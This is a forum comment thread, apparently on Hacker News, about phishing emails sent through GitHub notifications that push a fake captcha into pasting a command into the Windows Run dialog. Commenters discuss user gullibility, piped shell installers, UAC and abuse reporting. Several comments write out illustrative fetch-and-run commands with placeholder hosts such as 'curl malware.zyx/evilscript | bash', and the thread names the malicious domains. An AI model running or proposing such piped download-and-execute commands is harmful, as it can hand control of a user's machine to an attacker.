GitHub notification emails used to send malware
ianspence.com
ianspence.com
First, I assume the author knows the email came from github, as the screenshot does not show this very clearly. If that's the case:
Red flag #1: email links to a variation of real domain. If you don't have information on who github-scanner.com is, it is pretty safe to assume it's a scam , just because it sounds like a real website.
GIANT Enormous Huge Red Flag #2: captcha asks you to types command in shell. I have no comment on how naive one must be to do this.
Nobody is perfect. The more features of credibility, most likely there will be a higher percentage of conversions. But not everybody has excellent vision, is not time-pressured, and is not tired/exhausted.
There are lots of conditions that make otherwise difficult fraud targets more easy to trick.
And if it can be done at large scale / automated, then small conversion rates turn into many successful frauds (compromised accounts).
I've since changed the address bar back to the top…
In the end I didn't loose anything but it was a good wakeup call for sure.
I got a real letter from the IRS two days before I got the scam message on my answering machine. The timing was uncanny and I might easily have fallen for it, had I not already dealt with it.
It’s the same for the Chinese language calls, if you speak Chinese it really resonates.
There was a scam in the 90s where you’d call a number and they’d give you sports betting advice. They’d do it for free as a promotion trying to sell their service when you won. They’d tell half the callers bet team A and the other half team B. The numbers made it work.
“Splitting games 50-50 like that—known in the biz as "double-siding"—is the oldest trick in the handicapper's very thick book. That way he knows he has at least some happy customers coming back. “
https://vault.si.com/vault/1991/11/18/1-900-ripoffs-the-ads-...
In GitHub's case, they already have githubusercontent.com to avoid serving untrusted stuff from their own github.com domain.
Sending marketing or security scanner (potentially very spammy) notification emails from separate domains can help with reputation too, to avoid your main domain getting marked as spam.
These are all legit; Amex having 20 different of domains, half of which smell like phishing, and still sending emails from other domains is just incompetence. Something like marketing people or someone dealing with strategy deciding to do stuff in a certain way, with nobody technical in the room to tell them why that would be a problem. As an example, a friend of mine's organisation wanted to do a SaaS website for their niche, and a separate website to advertise the SaaS (separate domain, visual identity, everything).
And even if everything is up to date Pwn2Own regularly shows that having a user browse to a website is enough to get root access. Thankfully most people don’t have to worry about this since they are unlikely to attract the attention of someone with that level of resources.
I'm almost bored enough to just start installing weird malware for research and funsies
curl http://obscure.url?random-string | sh
git clone http://github.com/unknown/repo.git && cd repo && npm install
$ svn checkout
$ ./configure
$ make
# make install
wget random.club/rc-12-release.sh
chmod +x ./rc-12-release.sh
./rc-12-release.sh
almost nobody would actually read the script before running it
curl https://url-of-well-known-project | sh
I may not trust the owners of a random domain, but I certainly trust the owners of rustup.rs not to do anything intentionally malicious.Linux has a very good package management for many years. I see absolute no reason to break this by creating shell installers.
re #2: it doesn't really have you typing into shell, 'just paste'
I wouldn’t have fallen for such an obvious ploy, but the original asker seemed like they weren’t particularly technical, judging by the sparse GitHub history and quality of the question. I could see them perhaps falling for that if they were uncritical and too eager to try anything.
Aside from that:
> Nowhere in the email does it say that this is a new issue that has been created, which gives the attacker all the power to establish whatever context they want for this message.
What about the non-user-controlled "(Issue #1)" in the subject line?
It's too common, MS also does this, to be a red flag
So, I wouldn't blame the victims here if the service itself does not realize why that is not such a good idea.
It's not much different from setting up your ssh key - something that you have to do; and new users also go through this workflow by copy pasting commands that GitHub sends them.
Since Microsoft embracing and extending it, GitHub has become one of the worst offenders.
Last month I was in conference where the keynote was from CEO of cyber security company. The whole point of the speech was that we need more money because in some cases more than 80% users still fall into email scams. My very serious question to the speaker was - if after many millions and almost 25 years more than 80% users still click on wrong links, then maybe we do something really wrong?
Try to get a company built around Word to use another tech that doesn't requires running unsigned macros from emails...
You literally can't, they lough at you for saying things like "don't use Microsoft"
All our actions are defensive.
Look at our physical security. Basically nothing is reasonably protected. 99% of stuff (buildings, locks) can be broken into with tools available in any home depot.
The key reason why it doesn't happen that much is because it's possible to find the attacker.
Why can any scammed just create a website without any traceability? It wouldn't be foolproof, but it would raise a bar.
because jurisdictional challenges.
Not to mention that this very same traceability would be abused by some other authoritarian gov't to track down dissidents for example.
There's no real way to systematically have good security, if the human element is the weakest link tbh. Securing windows is not a technical problem, but a social and educational one.
Does the domain/server implements required level? No? Block connection. Dtto email with automatic response.
Is your IP in a botnet? Cut it off.
Edit: I already get blocked connection (on target site) because EU regulation is too onerous. I get reminded on basically every Google search I am being censored (Some results may have been removed under data protection law in Europe).
Completely doable.
More like "we want to track every single user coming to our website without giving them the option to not be tracked".
I have been part of se several GDPR compliance projects and it's the other stuff that's the problem.
Data protection officer (recurring cost, even though it is only a part of a job, not full time position) , user data deletion and user data take-out. Compliance is not free. If system wasn't designed from the beginning, it's really expensive to add it.
Restore from backup after disaster recovery - make sure you anonymize/delete people who were deleted after backup was made.
BTW, IP address is PII, so...
Honestly, it would be cheaper to buy everyone in EU VPN.
Why? While I get that, if tracking is part of someone's business model, they want to track as many people as possible, I doubt it would be illegal to give also people that aren't in the EU the option to not be tracked. If it really would be so expensive to be compliant while also differentiating between users connecting from the EU and users connecting from outside the EU, why not just give everyone the option to choose if they want tracking as a measure to cut compliance cost?
Add IP rules at cables inside and out of let's say EU and block it there.
Same way we deal with any non-compliance thing. You can't import it.
Your server/domain doesn't satisfy requirments. Either the originator complies or not (e.g. through trusted third party).
So far, we are building walls and replacing mortar with a new one, while attackers bombard us with complete impunity. This is never going to work.
This would of course need new extensions /protocols (even simplest would require authentication envelope around encrypted traffic).
Not a single response had anything to do with either problem ITA or my comment.
I am not sure if you are troll, 10 y/o or gpt1, but have a nice day.
Ultimately he's a businessman seeking for more money. Doesn't mean he can be trusted.
Fortunately, my work email supports IMAP, so I can use a script to scan my inbox for fake phishing emails and delete them.
> curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
(Yup, .rs is the ccTLD for the Republic of Serbia, of former SFR Yugoslavia)
someone who knows computers (like a programmer) might not fall for it, but people who do not know computers, but is dabbling could easily fall for it.
The copied command specifically puts in a "user friendly captcha message" into the end, to overflow the run dialog textbox, so that a user who obeyed the instructions will see something vaguely resembling valid captcha verification:
# " ''I am not a robot - reCAPTCHA Verification ID: 93752"
Phishing and scams are not about catching out pros, but catching out "normies".It's quite scary that the scammers have put thought and effort into the method of infiltration, because this is "novel" as far as i have heard.
A legitimate GitHub email would never mis-capitalize the company name like that. It would be GitHub, as shown in the footer that the attacker does not control.
OTOH, this is a very common mistake. The article alternates between the correct GitHub and the incorrect Github. So it would be easy to not notice that error.
The reality is different - they leave these huge red flags so that people who aren’t very bright or careful will fall for it.
That is the same reason why scammers put spelling mistakes in emails - not because they don’t know how to use spellcheck, but because they want to filter out those who would spot these mistakes.
They want to scam careless, gullible, „stupid“ people, not someone who is careful enough to spot security red flags.
> Do people really fall for scam like that?
I routinely get people opening issues on my projects asking where the source code is or how to fine tune their models on different data or even how to install pytorch.... There's a lot of people on GitHub that don't know the first thing about coding. There's a lot of people on GitHub that don't know how to use Google... This even includes people with PhDs...The naive way would be to just clone the repo without any (apparently) options.
I can attest to this because that’s probably what I would do.
The readme would not resolve a problem that someone knowingly had. It would resolve an unknown upcoming problem.
And if you're reading the README after cloning it already, there are instructions for sorting that out too, also suitable for copy and paste.
Or if you downloadeded the ZIP from GitHub - I'm sorry. But you won't be left too confused, at least you won't if you read my README, because my README covers this situation as well.
(Also: don't forget to git submodule update after changing branch! But if you're noting everything my README tells you, you won't.)
I guess critical thinking of devs and wannabee devs has been softened by all the `curl <script> | bash` installation instructions.
Funnily enough there's at least one legit captcha that has you do this: if you have JavaScript/WASM disabled it gives you the option of running the anti-DDOS proof-of-work in a shell and pasting the result in a textbox.
Couple that with gmail having no way to show the full email address (by default - I know you can hover, etc.), rather than the sender-provided "sender name", and my false-positive rate for at least double checking and confirming the sending domain is kinda high...better that than a bunch of false-negatives of course.
Yes. It wouldn't be a thing otherwise. I know at least two fairly intelligent people, one literally being a Mensa member, who fell for sextortion emails and got their files encrypted.
Scareware is based on social engineering, and is crafted to trigger emotional response, not educated one.
You should put a "voice activated" sticker on a random break room appliance (toaster, water/ice dispenser, microwave, coffee machine, ...).
Don't use strong adhesive if your desk is within hearing distance.
This email came from the real PayPal.com, how they haven't gotten on top of usernames like that is beyond me for a payment processor. I reported it to them but haven't heard anything back, hopefully they banned that account but they should ban all names like that.
This email honestly was formatted to look like a legit PayPal email, I have to imagine that scam will trick a lot of normal people.
Get in touch, see my bio website, if you want the email.
this is why anything but plain text should be blocked in emails (besides security reasons). anybody with 5 minutes of HTML experience can create "legit looking" emails.
Press Win+R, CTRL+V <enter>
From captcha to gotcha.I could see junior developers falling for this. Hey it's Github, it's legit right? We get security notifications every second months about some lib everyone uses etc.
"Oh look, captcha by running code, how neat!"
I don't think webpages should be able to fill your copy/paste buffer from a click without a content preview. They made it requiring a user action, such as clicking, thinking that would solve the problem but it's still too weak. That's problem number 1.People need to stop actioning any links from emails and/or believing that any content in an email has legitimacy. It doesn't. That's problem number 2.
Problem number 3, Windows still let you root a machine by 1 line in powershell? What the @$$%&%&#$?
Github might need to stop people putting links in issues without being checked by automated services that can validate the content as remotely legitimate. They're sending this stuff to people's email, don't tell me they're not aware this could be used for fishing! That's cyber security 101, in 2015.
Finally, Github, in being unable to act on the above, may need to better strip what they email to people, and essentially behave more like banks "you have a new issue in this repository..." and that's that. You then go there, there is no message, ok great. That would have taken care of this issue...
It seems Github needs to graduate a bit here.
The clipboard strategy feels like it should be easy to block too, most scammers just convince people to type a well-obscured URL into the Run dialog manually over the phone.
yea, the browser should actually have each site ask for permission to modify the clipboard imho.
sigh It needs to be run under an account with admin privileges for that. The shield on the "Run" dialog screenshot clearly indicates what it was taken under a user with admin privileges and UAC disabled.
Come on, now cry what Linux still let you root a machine by 1 line in curl malware.zyx/evilscript | bash.
Excuse me, but some of us prefer to let evil scripts root our machines via pure sh, thank you very much.
Making the script POSIX compliant would allow hacking computers without bash. Then you can pipe it into just “sh” which is guaranteed to be on the PATH.
you will have to accept that users either ask this UAC to be turned off, or it gets turned off by the original installer of the windows for the user (presumably non-technical user).
It's like telling traffic accident sufferers that they should've put on a seatbelt. True, but pointless.
Running with UAC disabled under an admin account?
That's not only a lack of a seatbelt, but wearing a flip-flops too.
And I'm eating my dogfood too, I'm running under a regular user since migrated from Vista, both on personal and work devices. Sometimes it's PITA, sure, but it's manageable.
You say it's a problem, I say it is a virtue.
We can "root" Windows because we are root, specifically a user in the Administrators group because the first user account configured by Windows Setup is always an administrator account.
This is a virtue. We can do whatever we want with the computer we own and use. This is freedom par excellence that literally every other operating system family today wishes they could do without getting shouted down.
In an era of increasingly locked down operating systems that prevent us from truly owning our computers, administering them, Windows just lets us do that. I hope to god this never changes.
You certainly don't need to do it with a single line of powershell though. At least, not without intentionally opting into it. For the most part on a daily basis I just want to use my computer, not modify it.
Anyway, at the very least most functionality should be sandboxed so that if someone does something without your consent, it can't do much damage. Though this wasn't the original intention, leveraging user privileges and sandboxing applications by user is an effective way to do this.
Besides what kind of moron would choose proprietary software if they wanted control of their machine? It's inherently a contradictory impulse.
just to clarify in Windows, users with administrative privileges will in theory still ask the user to opt-in every time before any process is elevated to administrative rights. Its just that Windows security is so awful that people have found many different creative ways around it over the years, but those are (sometimes) getting patched by Microsoft so they are considered "bugs".
For example a process stores its executable path in memory writable by itself, so you could start a process that replaces its executable string to "C:\Windows\explorer.exe" and it would (for whatever reason) bypass the "ask for administrative rights" dialog popup. This is the sort of "security" that Windows is built around to its very core.
https://github.com/hfiref0x/UACME
> "This tool shows ONLY popular UAC bypass method used by malware, and re-implement some of them in a different way improving original concepts. *There are different, not yet known to the general public, methods. Be aware of this;*"
(also i think you are responding to a troll btw)
You would be wrong.
> We can do whatever we want with the computer we own and use.
There is a difference between what an owner of a computer can and should be able to do, verses what an arbitrary actor can do to a computer they do not own through subterfuge. It is the responsibility of an Operating System to facilitate the former and guard against the latter.
MS Windows has a poor history of being able to do either.
Windows just lets us do anything and everything, and it's up to us how we want to secure it if at all.
Every other operating system family tries to realize security by straight up locking the user, the administrator, out of his own computer. They still get compromised, by the way.
Windows has absolutely succeeded and continues to succeed in enabling the user, including security if he so desires. This is the reason Windows became the dominant desktop OS. The others? Nope on both counts. The Linux world in particular always screams about user freedom, yet ironically it's Windows and its community that actually makes that freedom a reality.
Once more: I hope to god this never changes.
There's also this impression that the operating system is just secure and you as the user are just protected like it's a law of physics. Spoiler alert, you are not and it's not a law of physics either. It's still your responsibility to secure the computer if you so desire and otherwise not do dumb shit like copypasta'ing commands from the internet.
I'm not even going to get into the politics that are package managers and repos, that's just straight bullshit that has more to do with human nature than computer science.
Speaking of politics, most of the FOSS community at large hates users using and administrators administering computers how they want. You must subscribe to the One Libre Way(tm) or you are a heathen doing it wrong. So much for freedom. The Windows community meanwhile is mostly composed of jaded engineers who are just happy to see others get stuff done and get through another day in one piece.
Windows from the start places the user at the controls with mostly no child safety locks in place (and you can remove what is there easily, eg: UAC), and with that power you have to accept that if you end up hosing the system the problem is you because Windows doesn't even pretend to really protect you.
Having the sheer power to hose Windows with a single Powershell line is what freedom is. Freedom is both delightful and horrifying.
> For starters it's security theater, given everyone and their dog prefixes sudo to all commands without much thinking.
Setting aside the hyperbole, such as "everyone and their dog prefixes sudo to all commands" and "most of the FOSS community at large hates users", user/group/other permissions are one part of security in depth. Excessive use of sudo is indicative of an improperly configured system or use of software which lacks understanding of the OS which runs it. Both are causes for concern.
> Windows from the start places the user at the controls with mostly no child safety locks in place ...
To continue your analogy, child safety locks exist to minimize avoidable catastrophic situations for those unable to do same.
> ... with that power you have to accept that if you end up hosing the system the problem is you because Windows doesn't even pretend to really protect you.
At first glance, this has a "victim blaming" flavour to it along the lines of "you should have known better." A more concerning implication is that this perspective does not take into consideration what happens when a blackhat attack is perpetrated.
What benefit is "the sheer power to hose Windows with a single Powershell line" when it is not you whom executes it?
0 - https://docs.freebsd.org/en/books/handbook/introduction/
>What benefit is "the sheer power to hose Windows with a single Powershell line" when it is not you whom executes it?
The benefit is the sheer power to hose Windows with a single Powershell line.
In case that doesn't make sense, let me put it this way: The benefit is the power to do whatever you want with Windows.
Windows essentially will not say no to what you ask of it, you have the freedom to do with your computer as you desire with Windows. With this power, this freedom, this virtue comes responsibility. You as the user must secure the system as desired from the ground up, you have the power to do so and the responsibility.
Computers are tools, Windows enabling your ability to use your computer as a tool is a virtue that is priceless especially in this day and age.
If you don't believe me, consider that Windows brought forth the era of personal computing to the commons and continues to enable them by nurturing an ecosystem that can cater to almost all users' desires that now spans literally decades.
> The benefit is the sheer power to hose Windows with a single Powershell line.
> In case that doesn't make sense, let me put it this way: The benefit is the power to do whatever you want with Windows.
The point which I think I am failing to convey is not about limiting what a person whom owns a computer can do with it. Instead, it is that computers interacting with other computers can be introduced to code which is not "whatever you want with Windows", but instead "whatever someone else wants to do with your Windows."
In the case you presented above, nowhere is there consideration of malicious actors. Were this not a real concern, there would be no market for virus scanners (be they for Windows or other operating systems).
Here is an exercise to try out - replace first person tense in the text above with the equivalent of "someone other than me."
Would this be the same Windows that now requires TPM2, UEFI Secure Boot, a Microsoft account to log in, and a special boot mode to use drivers not signed by Microsoft?
"I don't think that...". I think that you have to train your troops effectively in what is harmfull.
"Windows" - yes. I have been asked by at least two of my employees to get them away from Windows. I'll do my best. Its been a long running project but I will succeed.
Yes, I'm a 10X Windows user.
So is github-scanner.com (and github-scanner.shop) still the same malicious party? It seems to be. Funny that their DNS is hosted by Cloudflare (who, famously, don't host anything, because they think we're all dumb). Cloudflare, who take responsibility for nothing, has no way to report this kind of abuse to them.
The domain which hosts the malware, 2x.si, both uses Cloudflare for DNS and is hosted by Cloudflare. At least it's possible to report this to Cloudflare, even though they rate limit humans and have CAPTCHAs on their abuse reporting forms.
Sigh. Thanks to Cloudflare, it's trivial these days to host phishing and malware.
Extracting from the page
> Which category of abuse to select > Phishing & Malware
Failing that:
> If Cloudflare is listed as the registrar on an ICANN WHOIS listing, you also can email reports related to our registrar services to registrar-abuse@cloudflare.com
Rather one could use Qubes OS and only open links in disposable VMs and never enter info beyond that
Thats basically what I do when I get emails to confirm my email address for a new account
One can't always avoid clicking links can they?
Fair question, but the "don't click links in email" is for emails that you don't expect. And sure, that's an unsatisfying answer because it's hard to communicate this wisdom to your grandmother.
I think the best answer is defense-in-depth. Ensure you use updated email clients, browsers, and OS, and employ a dns blocker like a pihole or equivalent public service.
For less-savvy people a device like an iPad or Chromebook can be a reasonable defense.
Anyway, while I haven't heard of any cases yet, it wouldn't surprise me if senders of phishing email someday manage to deliver messages shortly after detecting some traffic (DNS lookup?) that you legitimately make with the entity the email is spoofing. Then you're expecting it, roughly.
To be fair about setting up a Pihole or some other form of DNS filtering, that's something that the network administrator should do, not individual users. It's a shame that it's still not trivial - companies that make NAT routers resist building in things that they don't completely control, so a configuration page for Pihole in your NAT router's web interface likely isn't coming soon. I hope that changes.
Mom also understands that someone taking over her Nextdoor account would be a nuisance, whereas someone taking over her banking account would be significantly more problematic, so the more important something is, the more time she'll take to ascertain its authenticity.
I practice explaining these things because I do it often. One interesting observation is that Mom believes me, so she does the things I suggest, whereas younger people think they know better, so they generally don't put much energy in to my suggestions. I'm working on ways of showing people that they're not necessarily safe because they're "doing the same things they've always done, and nothing bad has happened yet".
In the meantime, the majority of routers do allow you to specify the DNS resolver instead of using whatever it learns via WAN DHCP, so you could put in a filtered public resolver (as opposed to your own Pihole instance) which gives pretty similar results if you don't need to whitelist anything. Plus, you can do the same on mobile devices that roam beyond that router (and avoid VPN through said router). I've been using dns.adguard-dns.com (94.140.14.14 and 94.140.15.15) [0]. They were founded in Moscow but now operate out of Cyprus (EU) and I don't have much of a reason to trust any other DNS operator more than them.
[0] https://adguard-dns.io/en/public-dns.html -- "method 2"
Not saying you're wrong per se, but isn't it more so summarized with "don't fall for a 'CAPTCHA' that requires you to paste code into the window labeled 'This will run with administrative privileges'?"
This is more so a grumble than a serious comment on security, but agh, it's always bugged me that the metric for failing phishing tests is "clicked on any link in the email" and not, you know, entered credentials into the phish site, or downloaded and opened a file. Like, I get it, it's much easier to teach nontechnical users to simply not click bad links than that other stuff - and browser vulns do exist - but it still vaguely annoys me.
I feel like I've seen countless posts like this one that end in the user entering creds, giving the browser some weird permission, downloading some file (sometimes straight-up an executable), or in this case, running a command. I don't know if I've seen a single one that ends in "and then they clicked the link and it popped a browser 0-day and that was the end of that".
Web browsers are a wide attack surface, yes, but they're also... intended for browsing the Internet. Most people click through links pretty haphazardly as they're doing work or researching a topic. Defense in depth and all, but I feel like a security policy that holds "don't visit any evil websites ever" as a core tenet is pretty flawed.
I realized I have never deleted an issue I started but doesn't people with admin access the only with ability to delete the issues on a repo? [1]. So actually there is a trace for that issue in the repository. Same thing for Pull requests.
[1] https://docs.github.com/en/issues/tracking-your-work-with-is...
One very simple measure I hope they implement is just not sending emails for unverified spam like this. I’d argue a majority of issues or comments do not need instant emails. Even one hour delay could help in combating abuse like this if they had any sort of reasonable moderation rules.
Either you’re unlucky or I’m lucky, I’ve reported scammers to GitHub multiple times and always got a response in a couple of hours.
Usually it's a new user who clones a few repositories to pass whatever mitigation they have.
Always get a "lots of reports, this may take a while" email first though. I don't think I ever not got that one.
I think there's something to be said about sending - by default - user generated content by email automatically if you've replied once to a thread. Lots of bad defaults here imho.
Technical people might spot this, but that also isn't a free pass for GitHub to not do better here.
Easy to be suspicious with the link alone, but its fun to see someone digging into it.
Try this, I think it will fix your issue (install GCC if you need a compiler): (Bitly link redirecting to zip file on mediafire) Pass: (something)
GitHub processed my abuse report within an hour and removed all posts by that user.
[1] https://docs.github.com/en/code-security/dependabot/dependab...
I got dozens of such spam during a whole day.
There are more possible next steps, which would make creating accounts for spamming more expensive, but they will also inconvenience well-meaning new users.
I suspect that unless the problem of malicious spam from GitHub comments becomes rather serious, acting on the case by case basis may be the correct solution.
I’ve said for some time that, while LLMs are varying levels of useful for a lot of people, it’s practically tailor made for spam and phishing. I can’t think of any “product-market-fit” as good as that.
For instance: Imagine combining a leak of personal data from your favorite data broker (who knew that this would come back and bite), with an LLM to bypass spam filters and perform phishing attacks with eerie believable social engineering behind it. All for next to no money.
This is almost as easy as it was to call someone and asking them for the number of the modem on their desk and their logins back in the bad old days.
Considering the target platform I'm not overly surprised though.
Maybe devs' target value in general has growing to a point where the openness of the system is more of a vulnerability than service.
Might want to change the image too, macOS recognises the link in that and makes it clickable. I’d say that’s more dangerous than modifying it in the text of the post, you could just as well include a non-clickable text link.
Of all things that seem legit, this seems the legitest.
I think you are painting with a broad brush.
[0] https://web.archive.org/web/20240213030202/https://www.idont...
> This is no different from installing a random package through a package manager
I replied "No it isn't" in response to that, so I was claiming that a package manager was different (in terms of security) from doing curl | sh.
My comment then went on to explain specific attacks (a mirror being compromised) which are solved by package managers / cryptographic signatures.
At no point did I ever claim package managers were immune to all attacks. A compromised build server, leaked keys, or the upstream program thats being packaged being malicious are all still possible.
Its very simple, my Arch Linux install is pointed at the MIT mirrors. What is stopping the Massachusetts Institute of Technology from replacing my next firefox update with a virus? Cryptographic signatures. They don't have an Arch Linux signing key. What would be stopping them if I installed firefox by doing curl | sh? Nothing.
Why can't we have nice things again? Because of abusers yes, but also because of sheep people.
It's this "I'm a developer, I'm too smart to fall for phishing" mindset that makes developers an excellent target for malware.
I also have no clue why any reasonable person would refer to that monstrosity as a CAPTCHA.